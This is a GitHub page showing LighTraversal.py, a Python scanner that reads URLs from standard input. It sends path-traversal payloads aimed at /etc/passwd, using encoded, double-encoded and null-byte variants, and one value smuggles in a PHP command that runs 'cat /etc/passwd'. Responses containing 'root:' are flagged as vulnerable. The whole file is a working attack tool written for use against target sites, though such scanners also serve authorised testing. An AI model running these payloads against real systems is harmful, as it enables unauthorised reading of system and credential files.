-
Notifications
You must be signed in to change notification settings - Fork 0
/
LighTraversal.py
79 lines (69 loc) · 2.37 KB
/
LighTraversal.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
#!/usr/bin/env python3
import sys
import requests
class bcolors:
OK = '\033[92m'
FAIL = '\033[91m'
RESET = '\033[0m'
def UrlBuilder(params, payload, file):
for key, value in params.items():
params[key]=payload+file
url = '&'.join('{}={}'.format(key, value) for key, value in params.items())
return url
def Verif(response, url):
if 'root:' in response:
print(bcolors.FAIL+'[VULN]'+url+bcolors.RESET)
else:
print(bcolors.OK+'[NOT VULN]'+url+bcolors.RESET)
def main():
payloads = ["/","../../","../../../","....//....//....//","..///////..///////..///////","..%5c..%5c..%5c","..%253f..%253f..%253f","..%c0%af..%c0%af..%c0%af","%252e%252e%252f%252e%252e%252f%252e%252e%252f","/var/www/images/../../../"]
files = ["etc/passwd","etc//passwd","etc///////passwd","etc%5cpasswd","etc%253fpasswd","etc%c0%afpasswd","etc%252fpasswd","%20and%20die(system(%27cat%20/etc/passwd%27))%20or%20"]
nullbyte = []
if len(sys.argv) > 2:
print(bcolors.FAIL+"[!] "+bcolors.RESET+"too much arguments given.")
print(bcolors.OK+"[*] "+bcolors.RESET+"usage: echo 'https://target.com/...' | python3 LighTraversal.py [--null-byte]")
print(bcolors.OK+"[*] "+bcolors.RESET+"usage: cat urls.txt | python3 LighTraversal.py [--null-byte]")
print(bcolors.OK+"[*] "+bcolors.RESET+"usage: other tool | python3 LighTraversal.py [--null-byte]")
sys.exit(1)
if '--null-byte' in sys.argv:
for file in files:
file = file+'%00'
nullbyte.append(file)
for line in sys.stdin:
try:
if not '=' in line:
for payload in payloads:
if '--null-byte' in sys.argv:
for file in nullbyte:
url=line.strip()+payload+file
rq = requests.get(url)
Verif(rq.text, url)
else:
for file in files:
url = line.strip()+payload+file
rq = requests.get(url)
Verif(rq.text, url)
else:
params = dict(x.split('=') for x in line.split('&'))
for payload in payloads:
if '--null-byte' in sys.argv:
for file in nullbyte:
url = UrlBuilder(params, payload, file)
rq = requests.get(url)
Verif(rq.text, url)
else:
for file in files:
url = UrlBuilder(params, payload, file)
rq = requests.get(url)
Verif(rq.text, url)
except KeyboardInterrupt:
sys.exit(1)
except:
pass
if __name__ == '__main__':
try:
main()
except Exception as e:
print("A problem has occured.")
print("Error info:")
print(e)